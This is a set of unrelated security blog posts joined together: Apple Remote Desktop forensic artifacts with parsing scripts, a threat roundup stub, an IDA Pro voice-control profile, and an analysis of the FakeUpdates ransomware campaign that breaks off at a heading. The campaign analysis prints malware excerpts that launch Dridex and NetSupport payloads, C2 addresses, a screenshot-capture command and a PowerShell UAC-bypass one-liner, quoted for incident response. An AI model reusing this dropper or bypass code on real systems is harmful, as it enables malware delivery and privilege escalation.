Each “runData” array contains at least one dictionary consisting of the following keys and values:

| Key | Value Format | Description |
| --- | --- | --- |
| wasQuit | Boolean: true or false | Indicator of whether or not the application was quit prior to the last report time. This field may not exist if the value is not “true”. |
| Frontmost | Number of seconds | Total duration which the application was “frontmost” on the screen |
| Launched | macOS absolute timestamp | Time the application was launched |
| runLength | Number of seconds | Duration the application was run |
| username | String | User who launched the application |

Table 2: AppUsage.plist runData keys and values

Of the two application usage cache artifacts, RemoteManagement/caches/AppUsage.plist usually contains the same or more content than RemoteManagement/caches/AppUsage.tmp.
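Because these caches are ordinary (binary) property lists, they can be triaged quickly with Python's plistlib. The sketch below prints launch activity from AppUsage.plist, converting the macOS absolute timestamps (seconds since 2001-01-01 00:00:00 UTC); the key names follow Table 2, everything else is our own illustration rather than ARDvark itself, and UserAcct.tmp can be walked the same way.

import plistlib
from datetime import datetime, timedelta, timezone

# macOS absolute (Core Foundation) timestamps count seconds from 2001-01-01 UTC.
CFABSOLUTE_EPOCH = datetime(2001, 1, 1, tzinfo=timezone.utc)

def cfabsolute_to_datetime(ts: float) -> datetime:
    return CFABSOLUTE_EPOCH + timedelta(seconds=ts)

with open("/private/var/db/RemoteManagement/caches/AppUsage.plist", "rb") as f:
    app_usage = plistlib.load(f)

for app_url, details in app_usage.items():
    for run in details.get("runData", []):
        print(details.get("Name", app_url),
              run.get("username"),
              cfabsolute_to_datetime(run.get("Launched", 0)),
              f'ran for {run.get("runLength", 0):.0f}s')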

User Activity

The RemoteManagement/caches/UserAcct.tmp file is a binary plist that contains user activity that can be correlated with other artifacts on a macOS system, such as the Apple System Logs or Audit Logs. The file contains keys with the short name of each user that has logged on to the system.

Each key contains a dictionary that includes a “uid” string with the user’s UID, and an array for each login type: console, tty, or SSH. Each login-type array contains at least one dictionary consisting of the following keys and values:

| Key | Value Format | Description |
| --- | --- | --- |
| inTime | macOS absolute timestamp | Time the user logged in |
| outTime | macOS absolute timestamp | Time the user logged out |
| host | String | Originating host for remote login. This field has been observed to not be consistently present. |

Table 3: UserAcct.tmp keys and values

Artifacts From ARD Administrator Systems

The data outlined in Table 1 is reported to the administrator system daily. The files are then stored in the RemoteManagement/ClientCaches/ directory. Each file is renamed to the MAC address of the reporting system and placed into the appropriate subdirectory, as seen in Table 4. The subdirectories contain the following:

| Subdirectory | Data Contained in Each File |
| --- | --- |
| ApplicationUsage/ | AppUsage.plist files |
| SoftwareInfo/ | Filesystem.cache files |
| SystemInfo/ | Sysinfo.cache files |
| UserAccounting/ | UserAcct.tmp files |

Table 4: /private/var/db/RemoteManagement/ClientCaches/ subdirectories

Additionally, there is a plist file, RemoteManagement/ClientCaches/cacheAccess.plist that contains keys of MAC addresses with values of more MAC addresses. The purpose and context for this file has yet to be determined.

The Gold Mine

All the aforementioned data, with the exception of the filesystem.cache files, is added to the main SQLite database RemoteManagement/RMDB/rmdb.sqlite3 (“RMDB”). The RMDB exists on all ARD systems but is only populated on the administrator system. It houses a wealth of information about the systems in the ARD network over a significant timespan. Mandiant has observed data for application usage timestamps from over a year prior to when we acquired a database on a live system.

The RMDB file contains five tables: ApplicationName, ApplicationUsage, PropertyNameMap, SystemInformation, and UserUsage. The following sections detail each table within the database:

ApplicationName

This table is an index for the applications on each system, where each application is assigned an item sequence number (“ItemSeq”) per system. This data is used for correlation in the ApplicationUsage table.

| Column | Value Format | Description |
| --- | --- | --- |
| ComputerID | String | Client MAC address, no separators |
| AppName | String | Friendly application name |
| AppURL | String | Application URL path (i.e. file:///Applications/Calculator.app) |
| ItemSeq | Integer | ID number for each application, per ComputerID; referenced by the ApplicationUsage table |
| LastUpdated | macOS absolute timestamp | Last report time of the client |

Table 5: ApplicationName table columns

ApplicationUsage

The ApplicationUsage table is unique in that the “FrontMost” and “LaunchTime” values in the table are swapped. The research at the time of this blog post was verified on macOS 10.14 (Mojave).

| Column | Value Format | Description |
| --- | --- | --- |
| ComputerID | String | Client MAC address, no separators |
| FrontMost | macOS absolute timestamp | Application launch time |
| LaunchTime | Number of seconds to 6 decimal places | Total duration the application was “frontmost” on screen |
| RunLength | Number of seconds to 6 decimal places | Total duration the application was running |
| ItemSeq | Integer | ItemSeq number for the respective ComputerID, referenced in the ApplicationName table |
| LastUpdated | macOS absolute timestamp | Last report time of the client |
| UserName | String | User who launched the application |
| RunState | Integer | “1” for “running”, or “0” for “terminated” at the time of the last report |

Table 6: ApplicationUsage table columns
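If you prefer to work with the database directly instead of (or alongside) ARDvark, a few lines of Python and SQL recover human-readable application usage. This sketch joins ApplicationUsage to ApplicationName on ComputerID and ItemSeq and reads the launch time out of the FrontMost column to account for the swap noted above; table and column names follow this post, everything else is illustrative:

import sqlite3
from datetime import datetime, timedelta, timezone

CFABSOLUTE_EPOCH = datetime(2001, 1, 1, tzinfo=timezone.utc)

conn = sqlite3.connect("rmdb.sqlite3")   # a collected copy of RemoteManagement/RMDB/rmdb.sqlite3
query = """
    SELECT u.ComputerID, n.AppName, u.UserName, u.FrontMost AS launch_ts, u.RunLength
    FROM ApplicationUsage AS u
    JOIN ApplicationName AS n
      ON n.ComputerID = u.ComputerID AND n.ItemSeq = u.ItemSeq
    ORDER BY u.FrontMost
"""
for computer_id, app, user, launch_ts, run_length in conn.execute(query):
    launched = CFABSOLUTE_EPOCH + timedelta(seconds=launch_ts)
    print(f"{computer_id} {launched:%Y-%m-%d %H:%M:%S} {user} launched {app} for {run_length:.0f}s")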

PropertyNameMap

This table is used as a reference for the SystemInformation table.

| Column | Value Format | Description |
| --- | --- | --- |
| ObjectName | String | Various elements of a macOS system, such as Mac_HardDriveElement, Mac_USBDeviceElement, Mac_SystemInfoElement |
| PropertyName | String | Property names for each element, such as ProductName, ProductID, VendorID, VendorName for Mac_USBDeviceElement |
| PropertyMapID | Integer | ID number for each property, per element |

Table 7: PropertyNameMap table columns

SystemInformation

There is a substantial amount of system information collected in this table. This table can be leveraged to extract USB device information, IP addresses, hostnames, and more, of all the reported client systems.

| Column | Value Format | Description |
| --- | --- | --- |
| ComputerID | String | Client MAC address, with colon separators |
| ObjectName | String | Elements of a macOS system outlined in the PropertyNameMap table |
| PropertyName | String | Properties per element outlined in the PropertyNameMap table |
| ItemSeq | Integer | ID number for each element, i.e. if there are 4 Mac_USBDeviceElement data sets, each one will have an ItemSeq number, 0-3, to group the properties together |
| Value | String | Data for the respective property |
| LastUpdated | yyyy-mm-ddThh:mm:ssZ | 24 hour local time, last report time of the client. Example: 2019-08-07T02:11:34Z |

Table 8: SystemInformation table columns

UserUsage

This table contains the user login activity for all the reported client systems.

| Column | Description of Value |
| --- | --- |
| ComputerID | Client MAC address, no separators |
| LastUpdated | macOS absolute timestamp, last report time of the client |
| UserName | Short name of the user |
| LoginType | Console, tty, or ssh |
| inTime | macOS absolute timestamp, time the user logged in |
| outTime | macOS absolute timestamp, time the user logged out |
| Host | Originating host for remote login. This field has been observed to not be consistently present. |

Table 9: UserUsage table columns

Filesystem Cache

The RemoteManagement/ClientCaches/filesystem.cache file is a database that indexes the files and directories found on a macOS computer’s file system. Rather than using SQLite like the RMDB, ARD uses a custom database implementation to track this information. Fortunately, the database file format is fairly simple, consisting of a file header, six tables, and entries that point to string values. By interpreting the information in the filesystem cache file, an investigator can recreate the directory structure of an ARD-enabled system. Mandiant uses this technique to identify and demonstrate the existence of attacker-created files.

The database header, identified by the magic value “hdix”, contains metadata about the database, such as the total number of indexed folders, files, and symlinks. Pointers from this header lead to the six tables: “main”, “names” (file names), “kinds” (file extensions), “versions” (macOS app bundle version infos), “users”, and “groups”. Entries in the “main” table contain references to entries in the other tables; by walking these references, an investigator can recover full file system paths and metadata.

In practice, the filesystem.cache file may be tens of megabytes in size, tracking dozens or hundreds of thousands of file system entries. Figure 4 shows truncated content of a parsed file system cache file; these entries are for the artifacts discussed in this article!


Figure 4: Screenshot of filesystem.cache contents, listing ARD artifacts

On a macOS system, the program “build_hd_index” traverses the file system and indexes the files and directories into filesystem.cache. Figure 5 shows a portion of the documentation for this tool; as expected, the default output directory is [/private]/var/db/RemoteManagement/caches/.


Figure 5: documentation for build_hd_index

Ironically, internet message board posts going back to at least 2007 complain of the performance impact of this tool. A post by “Anonymous” indicates that “build_hd_index” was designed to support file indexing on OS X Panther (2003), which didn’t have Spotlight. Now, 16 years later, we can exploit these artifacts during an incident response.

Introducing: ARDvark

It was evident that if this artifact exists in a future investigation, leveraging its wealth of data will be critical to identifying attacker activities. In some scenarios, investigators may be able to generate reports directly from an ARD administrator system, but this may not always be the case. If not, then investigators would have to rely on manually acquiring and extracting information from the RMDB file on the ARD administrator system. ARDvark is a tool that extracts all user activity and application usage recorded in the RMDB and outputs the data in an analyst-friendly format.

ARDvark will also process the AppUsage.plist and UserAcct.tmp files found on ARD client systems under /private/var/db/RemoteManagement/caches/. Additionally, ARDvark has the capability to parse the filesystem.cache files to produce a file system listing, as well as all users and groups present on the respective system. Please see the FireEye Github for more information.

Detecting and Preventing ARD Abuse

To detect suspicious ARD usage, organizations can monitor for anomalous modification of the /Library/Application Support/Apple/Remote Desktop/RemoteManagement.launchd file to identify remote desktop access enablement where ARD is not used. Analyzing the Unified Logs for evidence of unexpected kickstart commands during threat hunting missions can uncover suspicious ARD usage as well.
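As a starting point for the file-monitoring idea, the hedged sketch below checks a client for the "enabled" marker described earlier in RemoteManagement.launchd and reports the file's modification time; in a real deployment this signal would come from FIM or EDR telemetry rather than a standalone script:

from datetime import datetime, timezone
from pathlib import Path

LAUNCHD_FLAG = Path("/Library/Application Support/Apple/Remote Desktop/RemoteManagement.launchd")

def check_remote_management() -> str:
    if not LAUNCHD_FLAG.exists():
        return "RemoteManagement.launchd not present"
    enabled = "enabled" in LAUNCHD_FLAG.read_text(errors="replace")
    mtime = datetime.fromtimestamp(LAUNCHD_FLAG.stat().st_mtime, tz=timezone.utc)
    state = "ENABLED" if enabled else "disabled"
    return f"remote management {state} (file modified {mtime:%Y-%m-%d %H:%M:%S} UTC)"

print(check_remote_management())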

Mitigating ARD abuse is reliant upon the principle of least privilege. Mandiant recommends allowing as few remote control privileges as possible, and only allowing administrator privileges to necessary accounts. Apple provides guidance on setting privileges, and authenticating without using local accounts with ARD in the help page and in the ARD user guide. ARD administrators can then routinely generate reports in the ARD application to ensure no changes are made to administration privilege settings.

A Bushel of Evidence

Application usage artifacts for macOS are few and far between. To date, some of the best artifacts for application usage include CoreAnalytics files and the Spotlight database, but none of these artifacts provide the exact time of execution of all applications. While ARD artifacts are not present across every macOS system, if ARD is deployed in an enterprise environment it may provide some of the most valuable data for investigators which you would not uncover otherwise.

User login activity typically exists in the Apple System Logs and Audit Logs, but short log retention is frequently an issue when the average attacker dwell time in 2018 was 78 days. The RMDB provides a potential source of application usage and user login information that is over a year old, long outliving typical log retention times.

The system information available in the RMDB includes IP addresses, USB device information, and more which may be useful to investigators. Also, the file system cache files that are collected contain an extensive file listing of multiple macOS systems, which allows investigators to identify files or users of interest on other systems without having to collect data from the suspect system directly.

ARD is an excellent example of how remote administration tools provide an attack surface for abuse while simultaneously providing a vast amount of data to help piece together malicious activity, all from a single system. If your organization utilizes ARD, consider reviewing the information available through the reporting functionality during threat hunting and future investigations, as the artifact doesn’t fall far from the tree.

Threat Roundup for September 27 to October 4

Today, Talos is publishing a glimpse into the most prevalent threats we’ve observed between Sep. 27 and Oct. 4. As with previous roundups, this post isn’t meant to be an in-depth analysis. Instead, this post will summarize the threats we’ve observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.

Read More

Reference:

TRU10042019 – This is a JSON file that includes the IOCs referenced in this post, as well as all hashes associated with the cluster. The list is limited to 25 hashes in this blog post. As always, please remember that all IOCs contained in this document are indicators, and that one single IOC does not indicate maliciousness. See the Read More link above for more details.

IDA, I Think It’s Time You And I Had a Talk: Controlling IDA Pro With Voice Control Software

Introduction

This blog post is the next episode in the FireEye Labs Advanced Reverse Engineering (FLARE) team Script Series. Today, we are sharing something quite unusual. It is not a tool or a virtual machine distribution, nor is it a plugin or script for a popular reverse engineering tool or framework. Rather, it is a profile created for a consumer software application completely unrelated to reverse engineering or malware analysis… until now. The software is named VoiceAttack, and its purpose is to make it easy for users to control other software on their computer using voice commands. With FLARE’s new profile for VoiceAttack, users can completely control IDA Pro with their voice! Have you ever dreamed of telling IDA Pro to decompile a function or show you the strings of a binary? Well dream no more! Not only does our profile give you total control of the software, it also provides shortcuts and other cool features not previously available. It’s our hope that providing voice control for the world’s most popular disassembler will further empower users with repetitive stress injuries or disabilities to more effectively put their reverse engineering skills to use, and that this new accessibility option will also help the community at large work more efficiently.

Check out our video demonstration of some of the features of the profile to see it in action.

How Does It Work?

VoiceAttack is an inexpensive software application that utilizes the Windows Speech Recognition (WSR) feature to enable the creation of user-defined, voice-activated macros. The user specifies a key word or phrase, then defines one or more actions to be taken when that word or phrase is recognized. The most common types of actions to be taken include key presses, mouse movement and clicks, and clipboard manipulation. However, there are many other more advanced features available that provide a lot of flexibility to users including variables, loops, and conditionals. You can even have the computer speak to you in response to your commands! VoiceAttack requires an internet connection, but only during the registration process, after which the network adapter can be disabled or configured to a network that cannot reach the internet without issue.

To use VoiceAttack, you must first train Windows Speech Recognition to recognize your voice. Instructions on how to do so can be found here. This process takes only a few minutes at a minimum, but the more time you spend training, the better your experience with it will be.

What Does the IDA Pro Profile Provide?

FLARE’s IDA Pro profile for VoiceAttack maps every advertised keyboard shortcut in IDA Pro to a voice command. Although this is only one part of what the profile provides, many users will find this in itself very useful. When developing this profile, I was shocked to discover just how many keyboard shortcuts there really are for IDA Pro and what can be accomplished with them. Some of my favorite shortcuts are found under the View->Open Subviews and Windows menus. With this profile, I can simply say “show strings” or “show structures” or “show window x” to change the tab I am currently viewing or open a new view in a tab without having to move my mouse cursor anywhere. The next few paragraphs describe some other useful commands to make any reverse engineer’s job easier. For a more detailed description of the profile and commands available, see the Github page.

Macros

A series of voice commands can perform multi-step actions not otherwise reachable by individual keyboard shortcuts. For example, wouldn’t it be nice to have commands to toggle the visibility of opcode bytes (see Figure 1)? Currently, you have to open the Options menu, select the General menu item, input a value in the Number of opcode bytes text field, and click the OK button. Well, now you can simply say “show opcodes” or “hide opcodes” and it will be so!


Figure 1: Configuring the number of opcode bytes to show in IDA Pro's disassembly view

Defining a Unicode string in IDA Pro is a multi-step exercise, whether you navigate to the Edit->Strings menu or use the “string literals” keyboard shortcut Alt+A followed by pressing the U key as shown in Figure 2. Now you can simply say “make Unicode string” and the work is done for you.


Figure 2: String literals dialog in IDA Pro

Reversing a C++ application? The Create struct from selection action is a very helpful feature in this case, but it requires you to navigate to the Edit->Structs menu in order to use it. The voice command “create struct from selection” does this for you automatically. The “look it up” command will copy the currently highlighted token in the disassembly and search Google for it using your default browser. There are several other macros in the profile that are like this and save you a lot of time navigating menus and dialogs to perform simple actions.

Cursor Movement, Dialogs, and Navigation

The cursor movement commands allow the user to move the cursor up, down, left, or right, one or more times, in specified increments. These commands also allow for scrolling with a voice command that commences scrolling in a chosen direction, and another voice command for stopping scrolling. There are even voice commands to set the speed of the scroll to slow, medium, or fast. In the disassembly view, the cursor can also be moved per “word” on the current line of the disassembly or decompilation, or even per basic block or function.

Like many other applications, dialogs are a part of IDA Pro’s user interface. The ability to easily navigate and interact with items in a dialog with your voice is essential to a smooth user experience. Voice commands in the profile enable the user to easily click the OK or Cancel buttons, toggle checkboxes, and tab through controls in the dialog in both directions and in specified increments.

With the aid of a companion IDAPython plugin, additional navigation commands are supported. Commands that allow the user to move the cursor to the beginning or end of the current function, to the next or previous “call” instruction, to the previous or next instruction containing the highlighted token, or to a specified number of bytes forward or backwards from the current cursor position help to make voice-controlled navigation easier.
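The companion plugin itself is available on the project’s Github page. As a rough illustration of the kind of helper such navigation commands rely on (an assumption-laden sketch against the IDA 7.x IDAPython API, not the shipped plugin code), moving the cursor to the next call instruction could look like this:

# Illustrative IDAPython helper; not the actual plugin code
import idc
import ida_kernwin

def goto_next_call():
    """Jump to the next instruction whose mnemonic is 'call'."""
    ea = idc.next_head(ida_kernwin.get_screen_ea())
    while ea != idc.BADADDR:
        if idc.print_insn_mnem(ea) == "call":
            ida_kernwin.jumpto(ea)
            return ea
        ea = idc.next_head(ea)
    return idc.BADADDR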

These cursor movement and navigation commands enable users to have full control of IDA Pro without the use of their hands. While this is true and an important goal for the profile, it is not practical for people who have full use of their hands to go completely hands-free. The commands that navigate the cursor in IDA Pro will never be as fast or easy as simply using the mouse to point and click somewhere on the screen. In any case, users will find themselves building up a collection of voice commands they prefer to use that will depend on personal tastes. However, enabling full voice control allows reverse engineers who do not have full use of their hands to still effectively operate IDA Pro, which we hope will be of great use to the community. Having such a capability is also useful for those who suffer from repetitive strain injury.

Input Recognition

The commands described so far give you control over IDA Pro with your voice, but there is still the matter of providing textual input for items such as function and variable names, comments, and other text input fields. VoiceAttack does provide the ability in macros to enable and disable what is called “Dictation Mode”. When in Dictation Mode, any recognized words are added to a buffer of text until Dictation Mode is disabled. Then this text can be used elsewhere in the macro. Unfortunately, this feature is not designed to recognize the kinds of technical terms one would be using in the context of reverse engineering programs. Even if it were, there is still the issue of having to format the text to be a valid function or variable name. Instead of wrestling with this feature to try to make it work for this purpose, a very large and growing collection of “input recognition” commands was created. These commands are designed to recognize common words used in the names of functions and variables, as well as full function names as found in the C runtime libraries and the Windows APIs. Once recognized, the word or function name is copied to the user’s clipboard and pasted into the text field. To avoid the inadvertent triggering of such commands during the regular operation of IDA Pro, these commands are only active when the “input mode” is enabled. This mode is enabled automatically when certain commands are activated such as “rename” or “find”, and automatically disabled when dialog commands such as “OK” or “cancel” are activated. The input mode can also be manually manipulated with the “input mode on” and “input mode off” commands.

Conclusion

Today, the FLARE team is releasing a profile for VoiceAttack and a companion IDAPython plugin that enables full voice control of IDA Pro along with many added convenience features. The profile contains over 1000 defined commands and growing. It is easy to view, edit, and add commands to this profile to customize it to suit your needs or to improve it for the community at large. The VoiceAttack software is highly affordable and enables you to create profiles for any applications or games that you use. For installation instructions and usage information, see the project’s Github page. Give it a try today!

Head Fake: Tackling Disruptive Ransomware Attacks

Within the past several months, FireEye has observed financially-motivated threat actors employ tactics that focus on disrupting business processes by deploying ransomware en masse throughout a victim’s environment. Understanding that normal business processes are critical to organizational success, these ransomware campaigns have been accompanied by multi-million dollar ransom amounts. In this post, we’ll provide a technical examination of one recent campaign that stems back to a technique that we initially reported on in April 2018.

Between May and September 2019, FireEye responded to multiple incidents involving a financially-motivated threat actor who leveraged compromised web infrastructure to establish an initial foothold in victim environments. This activity bore consistencies with a fake browser update campaign first identified in April 2018 – now tracked by FireEye as FakeUpdates. In this newer campaign, the threat actors leveraged victim systems to deploy malware such as Dridex or NetSupport, and multiple post-exploitation frameworks. The threat actors’ ultimate goal in some cases was to ransom systems en masse with BitPaymer or DoppelPaymer ransomware (see Figure 1).


Figure 1: Recent FakeUpdates infection chain

Due to campaign proliferation, we have responded to this activity at both Managed Defense customers and incident response investigations performed by Mandiant. Through Managed Defense network and host monitoring as well as Mandiant’s incident response findings, we observed the routes the threat actor took, the extent of the breaches, and exposure of their various toolkits.

Knock, Knock: FakeUpdates are Back!

In April 2018, FireEye identified a campaign that used compromised websites to deliver heavily obfuscated Trojan droppers masquerading as Chrome, Internet Explorer, Opera, and/or Firefox browser updates. The compromised sites contained injected code placed directly in the HTML or in JavaScript components rendered by the pages. These sites were accessed by victim users either via HTTP redirects or watering-hole techniques utilized by the attackers.

Since our April 2018 blog post, this campaign has been refined to include new techniques and the use of post-exploitation toolkits. Recent investigations have shown threat actor activity that included internal reconnaissance, credential harvesting, privilege escalation, lateral movement, and ransomware deployment in enterprise networks. FireEye has identified that a large number of the compromised sites serving up the first stage of FakeUpdates have been older, vulnerable Content Management System (CMS) applications.

You Are Using an Older Version…of our Malware

The FakeUpdates campaign begins with a rather intricate sequence of browser validation, performed before the final payload is downloaded. Injected code on the initial compromised page will make the user’s browser transparently navigate to a malicious website using hard-coded parameters. After victim browser information is gleaned, additional redirects are performed and the user is prompted to download a fake browser update. FireEye has observed that the browser validation sequence may have additional protections to evade sandbox detections and post-incident triage attempts on the compromised site(s).


Figure 2: Example of FakeUpdate landing page after HTTP redirects

The redirect process used numerous subdomains, with a limited number of IP addresses. The malicious subdomains are often changed in different parts of the initial redirects and browser validation stages.

After clicking the ‘Update’ button, we observed the downloading of one of three types of files:

  • Heavily-obfuscated HTML applications (.hta file extensions)
  • JavaScript files (.js file extensions)
  • ZIP-compressed JavaScript files (.zip extensions)

Figure 3 provides a snippet of JavaScript that provides the initial download functionality.

var domain = '//gnf6.ruscacademy[.]in/';
var statisticsRequest = 'wordpress/news.php?b=612626&m=ad2219689502f09c225b3ca0bfd8e333&y=206';
var statTypeParamName = 'st';

var filename = 'download.hta';
var browser = 'Chrome';
var special = '1';   
var filePlain = window.atob(file64);
var a = document.getElementById('buttonDownload');

Figure 3: Excerpts of JavaScript code identified from the FakeUpdates landing pages

When the user opens the initial FakeUpdates downloader, the Windows Script Host (wscript.exe) is executed and the following actions are performed:

  1. A script is executed in memory and used to fingerprint the affected system.
  2. A subsequent backdoor or banking trojan is downloaded if the system is successfully fingerprinted.
  3. A script is executed in memory which:
    • Downloads and launches a third party screenshot utility.
    • Sends the captured screenshots to an attacker.
  4. The payload delivered in step 2 is subsequently executed by the script process.

The backdoor and banking-trojan payloads described above have been identified as Dridex, NetSupport Manager RAT, AZORult, and Chthonic malware. The strategy behind the selective payload delivery is unclear; however, the most prevalent payloads delivered during this phase of the infection chain were variants of the Dridex backdoor.

FakeUpdates: More like FakeHTTP

After the end user executes the FakeUpdates download, the victim system sends a custom HTTP POST request to a hard-coded Command and Control (C2) server. The POST request, depicted in Figure 4, shows that the threat actors used a custom request format for the initial callback. The Age HTTP header, for example, was set to a string of 16 seemingly random lowercase hexadecimal characters.


Figure 4: Initial HTTP communication after successful execution of the FakeUpdates dropper

The HTTP Age header typically represents the time in seconds since an object has been cached by a proxy. In this case, via analysis of the obfuscated code on disk, FireEye identified that the Age header correlates to a scripted “auth header” parameter; likely used by the C2 server to validate the request. The first HTTP POST request also contains an XOR-encoded HTTP payload variable “a=”.
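For analysts working with captured traffic, this XOR layer is simple to strip once the key is recovered from the obfuscated script. Below is a minimal sketch of a repeating-key XOR decoder; the key and captured parameter value are placeholders for illustration, not values recovered from this campaign.

from itertools import cycle
from urllib.parse import unquote_to_bytes

def xor_decode(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR; the same routine both encodes and decodes."""
    return bytes(b ^ k for b, k in zip(data, cycle(key)))

# Example usage against a captured "a=" or "b=" parameter value.
# PLACEHOLDER_KEY and captured_param are hypothetical; the real key would
# have to be recovered from the script delivered by the compromised site.
PLACEHOLDER_KEY = b"\x41"
captured_param = b"%00%01%02"  # URL-encoded capture goes here
print(xor_decode(unquote_to_bytes(captured_param), PLACEHOLDER_KEY))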

The C2 server responds to the initial HTTP request with encoded JavaScript. When the code is decoded and subsequently executed, system and user information is collected using wscript.exe. The information collected from the victim system included:

  • The malicious script that initialized the callback
  • System hostname
  • Current user account
  • Active Directory domain
  • Hardware details, such as manufacturer
  • Anti-virus software details
  • Running processes

This activity is nearly identical to the steps observed in our April 2018 post, indicating only minor changes in data collection during this stage. For example, in the earlier iteration of this campaign, we did not observe the collection of the script responsible for the C2 communication. Following the system information gathering, the data is XOR-encoded and sent via another custom HTTP POST request to the same C2 server, with the data included in the parameter “b=”. Figure 5 provides a sample of the second HTTP request.


Figure 5: Second HTTP POST request after successful system information gathering

Figure 6 provides a copy of the decoded content, showing the various data points the malware transmitted back to the C2 server.

0=500
1=C:\Users\User\AppData\Local\Temp\Chrome.js
2=AMD64
3=SYSTEM1
4=User
5=4
6=Windows_NT
7=DOMAIN
8=HP
9=HP EliteDesk
10=BIOS_VERSION
11=Windows Defender|Vendor Anti-Virus
12=Vendor Anti-Virus|Windows Defender|
13=00:00:00:00:00:00
14=Enhanced (101- or 102-key)
15=USB Input Device
16=1024x768
17=System Idle Process|System|smss.exe|csrss.exe|wininit.exe|csrss.exe| winlogon.exe|services.exe|lsass.exe|svchost.exe|svchost.exe|svchost.exe|svchost.exe|svchost.exe|
svchost.exe|spoolsv.exe|svchost.exe|svchost.exe|HPLaserJetService.exe|conhost.exe…

Figure 6: Decoded system information gathered by the FakeUpdates malware

After receiving the system information, the C2 server responds with an encoded payload delivered via chunked transfer-encoding to the infected system. This technique evades conventional IDS/IPS appliances, allowing for the second-stage payload to successfully download. During our investigations and FireEye Intelligence’s monitoring, we recovered encoded payloads that delivered one of the following:

  • Dridex (Figure 7)
  • NetSupport Manager Remote Access Tool (RAT) (Figure 8)
  • Chthonic or AZORult (Figure 9)
    function runFile() {
        var lastException = '';
        try {
            var wsh = new ActiveXObject("WScript.Shell");
            wsh.Run('cmd /C rename "' + _tempFilePathSave + '" "' + execFileName + '"');
            WScript.Sleep(3 * 1000);
            runFileResult = wsh.Run('"' + _tempFilePathExec + '"');
            lastException = '';
        } catch (error) {
            lastException = error.number;
            runFileExeption += 'error number:' + error.number + ' message:' + error.message;
        }
    }

Figure 7: Code excerpt observed in FakeUpdates used to launch Dridex payloads

    function runFile() {
        var lastException = '';
        try {
            var wsh = new ActiveXObject("WScript.Shell");
            runFileResult = wsh.Run('"' + _tempFilePathExec + '" /verysilent');
            lastException = '';
        } catch (error) {
            lastException = error.number;
            runFileExeption += 'error number:' + error.number + ' message:' + error.message;
        }
    }

Figure 8: Code excerpt observed in FakeUpdates used to launch NetSupport payloads

    function runFile() {
        var lastException = '';
        try {
            var wsh = new ActiveXObject("WScript.Shell");
            runFileResult = wsh.Run('"' + _tempFilePathExec + '"');
            lastException = '';
        } catch (error) {
            lastException = error.number;
            runFileExeption += 'error number:' + error.number + ' message:' + error.message;
        }
    }

Figure 9: Code excerpt observed in FakeUpdates used to launch Chthonic and AZORult payloads

During this process, the victim system downloads and executes nircmdc.exe, a legitimate NirCmd command-line utility that the attackers use during the infection process to save two system screenshots. Figure 10 provides an example command used to capture the desktop screenshots.

"C:\Users\User\AppData\Local\Temp\nircmdc.exe" savescreenshot "C:\Users\User\AppData\Local\Temp\6206a2e3dc14a3d91.png"

Figure 10: Sample command used to execute the NirCmd tool to take desktop screenshots

The PNG screenshots of the infected systems are then transferred to the C2 server, after which they are deleted from the system. Figure 11 provides an example of a HTTP POST request, again with the custom Age and User-Agent headers.


Figure 11: Screenshots of the infected system are sent to an attacker-controlled C2

Interestingly, the screenshot file transfers were neither encoded nor obfuscated, unlike other data elements transferred by the FakeUpdates malware. As soon as the screenshots are transferred, nircmdc.exe is deleted.

All Hands on Deck

In certain investigations, the incident was far from over. Following the distribution of Dridex v4 binaries (botnet IDs 199 and 501), new tools and frameworks began to appear. FireEye identified that the threat actors leveraged their Dridex backdoor(s) to execute the publicly available PowerShell Empire and/or Koadic post-exploitation frameworks. Managed Defense also identified the FakeUpdates-to-Dridex infection chain resulting in the download and execution of PoshC2, another publicly available tool. While it could be coincidental, it is worth noting that we first observed the use of PoshC2 in early September 2019, shortly after the announcement that Empire would no longer be maintained; this could represent a shift in attacker TTPs. These additional tools were often executed between 30 minutes and 2 hours after the initial Dridex download. The pace of the initial phases of related attacks possibly suggests that automated post-compromise techniques are used in part before interactive operator activity occurs.

We identified extensive usage of Empire and C2 communication to various servers during these investigations. For example, via process tracking, we identified a Dridex-injected explorer.exe executing malicious PowerShell: a clear sign of an Empire stager:


Figure 12: An example of PowerShell Empire stager execution revealed during forensic analysis

In the above example, the threat actors instructed the victim system to use the remote server 185.122.59[.]78 for command-and-control using an out-of-the-box Empire agent C2 configuration for TLS-encrypted backdoor communications.

During their hands-on post-exploitation activity, the threat actors also moved laterally via PowerShell remoting and RDP sessions. FireEye identified the use of WMI to create remote PowerShell processes, subsequently used to execute Empire stagers on domain-joined systems. In one specific case, the time delta between initial Empire backdoor and successful lateral movement was under 15 minutes. Another primary goal for the threat actor was internal reconnaissance of both the local system and domain the computer was joined to. Figure 13 provides a snippet of Active Directory reconnaissance commands issued by the attacker during one of our investigations.


Figure 13: Attacker executed commands

The threat actors used an Empire module named SessionGopher and the venerable Mimikatz to harvest endpoint session and credential information. Finally, we also identified the attackers utilized Empire’s Invoke-EventVwrBypass, a Windows bypass technique used to launch executables using eventvwr.exe, as shown in Figure 14.

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -NonI -c $x=$((gp HKCU:Software\Microsoft\Windows Update).Update); powershell -NoP -NonI -W Hidden -enc $x


Figure 14: PowerShell event viewer bypass
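Because this launcher reads its payload out of a registry value, a quick triage check on a suspect host can simply look for that value. The sketch below is a hunting aid added here for illustration; it checks the HKCU\Software\Microsoft\Windows Update location referenced in the command shown in Figure 14.

import winreg

SUSPECT_KEY = r"Software\Microsoft\Windows Update"  # path abused in Figure 14
SUSPECT_VALUE = "Update"

try:
    with winreg.OpenKey(winreg.HKEY_CURRENT_USER, SUSPECT_KEY) as key:
        data, reg_type = winreg.QueryValueEx(key, SUSPECT_VALUE)
        print(f"[!] {SUSPECT_KEY}\\{SUSPECT_VALUE} exists "
              f"({len(str(data))} chars); review for encoded PowerShell")
except FileNotFoundError:
    print("[+] No staged payload found at the suspect registry location")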

Ransomware Attacks & Operator Tactics

